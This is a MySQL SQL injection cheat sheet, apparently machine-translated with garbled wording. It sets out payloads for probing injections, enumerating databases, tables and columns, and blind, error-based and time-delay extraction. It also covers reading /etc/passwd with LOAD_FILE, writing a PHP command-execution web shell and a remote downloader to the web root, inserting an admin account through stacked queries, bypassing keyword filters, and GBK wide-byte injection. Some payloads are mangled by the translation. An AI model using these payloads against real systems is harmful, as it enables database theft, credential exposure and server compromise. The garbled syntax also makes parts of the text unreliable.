The database that exists by default:
Mysql |
Requires root permission to read |
Information_schema |
exists in more than 5 versions |
Test for the presence of an injection method
False: Indicates that the query is wrong (MySQL error/Return page is different from the original)
True: Indicates that the query is normal (the return page is the same as the original)
A total of three cases:
when querying for string types: |
when a numeric type is queried: |
when landing: |
‘ |
False |
‘‘ |
Really |
" |
False |
"" |
Really |
\ |
False |
\\ |
Really |
|
and 1 |
Really |
and 0 |
False |
and true |
Really |
and false |
False |
1-false |
Return 1 results when there is a problem |
1-true |
Return 0 results when there is a problem |
2-1 |
Returns the same representation as 1 may be problematic |
1*56 |
Returns the same representation as 56 may be problematic |
1*56 |
Return with 1 same rep no problem |
|
' OR ' 1 |
' OR 1--- |
"OR" "=" |
"OR 1 = 1--- |
= |
' Like ' |
' =0--+ |
|
Example:
SELECT * FROM Users WHERE id = ' 1 '; SELECT * FROM Users WHERE id = 3-2; SELECT * from Users WHERE username = ' Mike ' and password = ' OR ' = ';
You can use a lot of single and double quotes, as long as they appear in pairs.
SELECT * FROM articles WHERE id = ' 121 ' "" "
The statement after the quotation marks will continue to execute.
Select ' 1 ' "" "" UNION Select ' 2 ' # 1 and 2
The following symbols can be used to annotate statements:
# |
Hash syntax |
/* |
C-style syntax |
-- - |
SQL syntax |
;%0 0 |
Empty bytes |
` |
Anti-Quote |
Example:
SELECT * from Users WHERE username = ' OR 1=1---' and password = '; SELECT * FROM Users WHERE id = ' UNION SELECT 1, 2, 3 ';
Test database version
VERSION () @ @VERSION @ @GLOBAL. VERSION
If the version is 5, the following example returns to true:
SELECT * FROM Users WHERE id = ' 1 ' and MID (VERSION (), 1, 1) = ' 5 ';
The MySQL query on the Windows platform differs from the one returned on Linux if the Windows Server returns results that contain-nt-log characters.
Database authentication information:
Table |
Mysql.user |
Field |
User, password |
Current user |
User (), Current_User (), Current_User, System_user (), Session_user () |
Example:
SELECT Current_User; SELECT Concat_ws (0x3A, user, password) from mysql.user WHERE user = ' root '--(privileged)
Database name:
Table |
Information_schema.schemata, Mysql.db |
Field |
Schema_name, DB |
Current database |
Database (), schema () |
Example:
SELECT database (); SELECT schema_name from Information_schema.schemata; SELECT DISTINCT (db) from mysql.db;--(privileged)
Server Host Name:
@ @HOSTNAME
Example:
SELECT @ @hostname;
Number of table and field detection fields
Two different ways:
ORDER by judgment |
ORDER by N+1; Let n continue to increase until the error page appears. Example: Query statement SELECT username, password, permission from Users WHERE id = ' 1 '; 1 ' ORDER by 1--+ true 1 ' ORDER by 2--+ true 1 ' ORDER by 3--+ true 1 ' ORDER by 4--+ false-query uses only 3 fields-1 ' UNION SELECT 1,2,3--+ True |
Based on Error query |
and (SELECT * from some_existing_table) = 1 Note: This method requires you to know the name of the table you want to query. This error method returns the number of fields in the table, not the wrong query statement. Example: Query statement SELECT permission from Users WHERE id = 1; and (SELECT * from Users) = 1 Returns the number of fields for users |
Query table name
Three different ways:
Union mode |
UNION SELECT GROUP_CONCAT (table_name) from Information_schema.tables WHERE version=10;--MySQL 4 version with Version=9,mysql 5 version with version=10 |
Blind note |
and SELECT SUBSTR (table_name,1,1) from Information_schema.tables > ' A ' |
Error |
and (select COUNT (*) from (select 1 union SELECT, NULL Union SELECT! 1) x GROUP by CONCAT (SELECT table_name from information _schema.tables LIMIT 1), Floor (RAND (0))) (@:=1) | | @ GROUP by CONCAT ((SELECT table_name from Information_schema.tables LIMIT 1), [email protected]) have @| | MIN (@:=0); and Extractvalue (1, CONCAT (0X5C, (SELECT table_name from information_schema.tables LIMIT 1));--Success in version 5.1.5. |
Query Column Name
Union mode |
UNION SELECT Group_concat (column_name) from information_schema.columns WHERE table_name = ' tablename ' |
Blind note |
and SELECT SUBSTR (column_name,1,1) from Information_schema.columns > ' A ' |
Error |
and (select COUNT (*) from (select 1 union SELECT, NULL Union SELECT! 1) x GROUP by CONCAT (select column_name from Informatio N_schema.columns LIMIT 1), Floor (RAND (0))) (@:=1) | | @ GROUP by CONCAT ((SELECT column_name from Information_schema.columns LIMIT 1), [email protected]) have @| | MIN (@:=0); and Extractvalue (1, CONCAT (0x5c, (SELECT column_name from Information_schema.columns LIMIT 1));--Success in version 5.1.5. and (+/-) = (SELECT * from some_existing_table UNION select LIMIT 1)--MySQL version 5.1 fixed |
Using procedure analyse () |
This requires a web presence page with a field for the query you've injected. Example: Query statement SELECT username, permission from Users WHERE id = 1; 1 PROCEDURE analyse () get the first segment name 1 limit PROCEDURE analyse () get the second segment name 1 limit 2,1 PROCEDURE analyse () get a third segment name |
Querying more than one table or column at a time
Select (@) from (select (@:=0x00), (select (@) from (information_schema.columns) WHERE (table_schema>[ Email protected]) and (@) in (@:=concat (@,0x0a, ' [', Table_schema, '] > ', table_name, ' > ', column_name))) x
Example:
SELECT * from the Users WHERE id = '-1 ' UNION select 1, 2, (select (@) from (select (@:=0x00), (select (@) from (Information_sch Ema.columns) WHERE (table_schema>[ Email protected]) and (@) in (@:=concat (@,0x0a, ' [', Table_schema, '] > ', table_name, ' > ', column_name)))) x), 4--+ ';
Output Result:
[Information_schema] >character_sets > Character_set_name [information_schema] >character_sets > DEFAULT_ Collate_name [Information_schema] >character_sets > DESCRIPTION [information_schema] >character_sets > MAX LEN [Information_schema] >collations > collation_name [information_schema] >collations > CHARACTER_SET_NAM E [Information_schema] >collations > ID [information_schema] >collations > Is_default [information_schema ] >collations > is_compiled
Using code:
SELECT MID (Group_concat (0x3c62723e, 0X5461626C653A20, TABLE_NAME, 0x3c62723e, 0X436F6C756D6E3A20, column_name ORDER by (SELECT version from Information_schema.tables) SEPARATOR 0x3c62723e), 1,1024) from Information_schema.columns
Example:
Select username from Users WHERE id = '-1 ' UNION SELECT MID (Group_concat (0x3c62723e, 0X5461626C653A20, TABLE_NAME, 0x3c627 23e, 0X436F6C756D6E3A20, column_name ORDER by (SELECT version from information_schema.tables) SEPARATOR 0x3c62723e), 1,1024) from Information_schema.columns;
Output Result:
Table:talk_revisionsColumn:revidTable:talk_revisionsColumn:useridTable:talk_revisionsColumn:userTable:talk_ Projectscolumn:priority
The table where the query is based on the column name
SELECT table_name from information_schema.columns WHERE column_name = ' username '; |
Query field username table |
SELECT table_name from Information_schema.columns WHERE column_name like '%user% '; |
Table with user in the query field |
Fields that are included based on a table query
SELECT column_name from information_schema.columns WHERE table_name = ' Users '; |
Querying fields in the user table |
SELECT column_name from Information_schema.columns WHERE table_name like '%user% '; |
Query contains fields from the User string table |
Bypass Quote Limit
SELECT * from Users WHERE username = 0x61646d696e |
Hex Code |
SELECT * from Users WHERE username = CHAR (97, 100, 109, 105, 110) |
Take advantage of the char () function |
Bypass String blacklist
SELECT ' A ' d ' mi ' n '; |
SELECT CONCAT (' A ', ' d ', ' m ', ' I ', ' n '); |
SELECT concat_ws (', ' a ', ' d ', ' m ', ' I ', ' n '); |
SELECT group_concat (' A ', ' d ', ' m ', ' I ', ' n '); |
When using concat (), any parameter is NULL, NULL is returned, and CONCAT_WS () is recommended.
The first parameter of the CONCAT_WS () function indicates which character interval is used to query the result.
Conditional statements
Case |
IF () |
Ifnull () |
Nullif () |
Example:
SELECT IF (1=1, True, false); SELECT case is 1=1 then true ELSE false END;
Time Delay query:
SLEEP () |
MySQL 5 |
BENCHMARK () |
MySQL 4/5 |
Example:
'-(IF (Version (), () like 5, BENCHMARK (100000,SHA1 (' true ')), false))-'
Permissions file Permissions
The following statement can query the user read and write file operation permissions:
SELECT File_priv from mysql.user WHERE user = ' username '; |
Requires root user to execute |
MySQL 4/5 |
SELECT grantee, is_grantable from information_schema.user_privileges WHERE privilege_type = ' file ' and grantee like '%user Name% '; |
Ordinary users can |
MySQL 5 |
Read file
If the user has file manipulation permissions to read the file:
Load_file ()
Example:
SELECT load_file ('/etc/passwd '); SELECT Load_file (0x2f6574632f706173737764);
- The file must be on the server.
- The current directory of the Load_file () function action file is @ @datadir.
- The MySQL user must have permission to read this file.
- The file size must be less than max_allowed_packet.
- The default size of @ @max_allowed_packet is 1047552 bytes.
Write a file
If the user has file manipulation permissions, the file can be written.
Into Outfile/dumpfile
Write a shell for PHP:
SELECT ' <? System ($_get[\ ' c\ ');?> ' into OUTFILE '/var/www/shell.php ';
Visit the following link:
http://localhost/shell.php?c=cat%20/etc/passwd
Write a download by:
SELECT ' <? Fwrite (fopen ($_get[f], \ ' w\ '), file_get_contents ($_get[u]));?> ' into OUTFILE '/var/www/get.php '
Visit the following link:
Http://localhost/get.php?f=shell.php&u=http://localhost/c99.txt
- Into OUTFILE can not overwrite files that already exist.
- Into OUTFILE must be the last query.
- Quotation marks are necessary because there is no way to encode the pathname.
PDO heap Query mode operation database
PHP uses Pdo_mysql to connect to a database and can use heap queries, which can execute multiple statements at the same time.
SELECT * from Users WHERE id=1 and 1=0; INSERT into Users (username,password,priv) VALUES (' Bobbytables ', ' kl20da$$ ', ' admin ');
MySQL-specific notation
In MySQL,/*! SQL statements * * The SQL statements in this format are parsed as normal statements.
If there is a string followed by a number (this string is the version number of the MySQL database), such as:/*! 12345 SQL Statement */
When the version number is greater than or equal to the number, the SQL statement executes, otherwise it is not executed.
SELECT 1/*!41320union/*!/*!/*!00000select/*!/*! user/*! (/*!/*!/*!*/);
Blur and confuse allowed characters
09 |
Horizontal Tab |
0A |
New Line |
0B |
Vertical Tab |
0C |
New Page |
0D |
Carriage Return |
A0 |
Non-breaking Space |
20 |
Space |
Example:
'%0a%09union%0cselect%a0null%20%23
Parentheses can also be used to bypass filtering of whitespace:
Example:
UNION (SELECT (column) from (table))
Characters that can be followed by and OR or
20 |
Space |
2 b |
+ |
The |
- |
7E |
~ |
21st |
! |
40 |
@ |
Example:
SELECT 1 from dual WHERE 1=1 and-+-+-+-+~~ ((1))
Dual is a virtual table that can be used for testing.
Several examples of blacklist bypass based on the keyword blacklist
Filter keywords |
And OR |
PHP code |
Preg_match ('/(and|or)/I ', $id) |
The attack code that will be filtered |
1 or 1=1 1 and 1=1 |
Bypass mode |
1 | | 1=1 1 && 1=1 |
Here's how you need to know some table and field names (you can use the SUBSTRING function to get the data from a information_schema.columns table)
Filter keywords |
and OR union |
PHP code |
Preg_match ('/(and|or|union)/I ', $id) |
The attack code that will be filtered |
Union Select User,password from Users |
Bypass mode |
1 && (select User from users where userid=1) = ' admin ' |
Filter keywords |
and or union where |
PHP code |
Preg_match ('/(and|or|union|where)/I ', $id) |
The attack code that will be filtered |
1 && (select User from users where user_id = 1) = ' admin ' |
Bypass mode |
1 && (select User from users limit 1) = ' admin ' |
Filter keywords |
and or union where |
PHP code |
Preg_match ('/(and|or|union|where)/I ', $id) |
The attack code that will be filtered |
1 && (select User from users where user_id = 1) = ' admin ' |
Bypass mode |
1 && (select User from users limit 1) = ' admin ' |
Filter keywords |
And, or, union, where, limit |
PHP code |
Preg_match ('/(and|or|union|where|limit)/I ', $id) |
The attack code that will be filtered |
1 && (select User from users limit 1) = ' admin ' |
Bypass mode |
1 && (select User from Users group by user_id have user_id = 1) = ' admin ' #user_id聚合中user_id为1的user为admin |
Filter keywords |
And, or, union, where, limit, group by |
PHP code |
Preg_match ('/(and|or|union|where|limit|group by)/I ', $id) |
The attack code that will be filtered |
1 && (select User from Users group by user_id have user_id = 1) = ' admin ' |
Bypass mode |
1 && (select substr (Group_concat (user_id), 1) user from users) = |
Filter keywords |
And, or, union, where, limit, group by, select |
PHP code |
Preg_match ('/(And|or|union|where|limit|group by|select)/I ', $id) |
The attack code that will be filtered |
1 && (select substr (Gruop_concat (user_id), 1) user from users) = |
Bypass mode |
1 && substr (user,1,1) = ' a ' |
Filter keywords |
And, or, union, where, limit, group by, select, ' |
PHP code |
Preg_match ('/(And|or|union|where|limit|group by|select|\ ')/I ', $id) |
The attack code that will be filtered |
1 && (select substr (Gruop_concat (user_id), 1) user from users) = |
Bypass mode |
1 && user_id is not null 1 && substr (user,1,1) = 0x61 1 && substr (user,1,1) = Unhex (61) |
Filter keywords |
And, or, union, where, limit, group by, select, ', Hex |
PHP code |
Preg_match ('/(And|or|union|where|limit|group by|select|\ ' |hex)/I ', $id) |
The attack code that will be filtered |
1 && substr (user,1,1) = Unhex (61) |
Bypass mode |
1 && substr (user,1,1) = Lower (conv (11,10,16)) #十进制的11转化为十六进制, and lowercase. |
filter keyword |
and, or, union, where, limit, group by, select, ', Hex, substr |
PHP code |
Preg_match ('/(And|or|union|where|limit|group by|select|\ ' |hex|substr)/I ', $id) | /tr>
will filter the attack code |
1 && substr (user,1,1) = Lower (conv (11,10,16))/td> |
Bypass Mode |
1 && lpad (user,7,1) |
Filter keywords |
And, or, union, where, limit, group by, select, ', Hex, substr, Space |
PHP code |
Preg_match ('/(And|or|union|where|limit|group by|select|\ ' |hex|substr|\s)/I ', $id) |
The attack code that will be filtered |
1 && lpad (user,7,1)/td> |
Bypass mode |
1%0b| |%0 Blpad (user,7,1) |
Filter keywords |
and or union where |
PHP code |
Preg_match ('/(and|or|union|where)/I ', $id) |
The attack code that will be filtered |
1 | | (Select User from users where user_id = 1) = ' admin ' |
Bypass mode |
1 | | (Select User from users limit 1) = ' admin ' |
Using regular expressions to make blind bets
As we all know, in MySQL 5+, all the library names, indicating and field name information are stored in the INFORMATION_SCHEMA library. The attack mode is as follows:
1. Determine if the first character of the first table name is a A-Z character, where Blind_sqli is the assumed known library name.
Index.php?id=1 and 1= (SELECT 1 from information_schema.tables WHERE table_schema= "Blind_sqli" and table_name REGEXP ' ^[a- Z] ' LIMIT 0,1)/*
2. Determine if the first character is a character in A-n
Index.php?id=1 and 1= (select 1 from information_schema.tables WHERE table_schema= "Blind_sqli" and table_name REGEXP ' ^[a-n] ' LIMIT 0,1)/*
3. Determine that the character is n
Index.php?id=1 and 1= (select 1 from information_schema.tables WHERE table_schema= "Blind_sqli" and table_name REGEXP ' ^n ' LIMIT 0,1)/*
4, the expression is replaced as follows
At this point the table name is news, to verify that the regular expression is ' ^news$ ', but it is not necessary to directly judge table_name = ' news ' is OK.
5, next guess to solve the other table only need to modify limit 2,1 limit, you can be the next table blind note.
Injection after ORDER BY
oder by because it is a sort statement, you can use conditional statements to make judgments, according to the results of the return of the order of different judging conditions of true and false.
It is possible that a variable with a oder or an out-of-the-way can be injected in the following ways when you know a field:
Original link: Http://www.test.com/list.php?order=vote is sorted according to the vote field.
Find the largest number of votes num then construct the following link:
Http://www.test.com/list.php?order=abs (vote-(User ()) >0) *num) +ASC
See if the sort changes.
There is also a method that does not need to know any field information, using the RAND function:
Http://www.test.com/list.php?order=rand (True) Http://www.test.com/list.php?order=rand (false)
The above two returns a different sort, and the statement that determines whether the first character in the table name is less than 128 is as follows:
Http://www.test.com/list.php?order=rand ((select char (substring (table_name,1,1)) from Information_schema.tables Limit 1) <=128))
Wide byte injection
The most commonly used GBK encoding in SQL injection is the one that bypasses the transfer of special characters such as Addslashes. The Hex of the backslash () is%5c, and when you enter%bf%27, the function encounters a single quote auto-transfer join \, at which point the%bf%5c%27,%bf%5c becomes a wide character "縗" in GBK. %BF that position can be any character in the middle of the%81-%fe. Wide character injection can be applied in many places, not just in SQL injection.
MySQL Inject science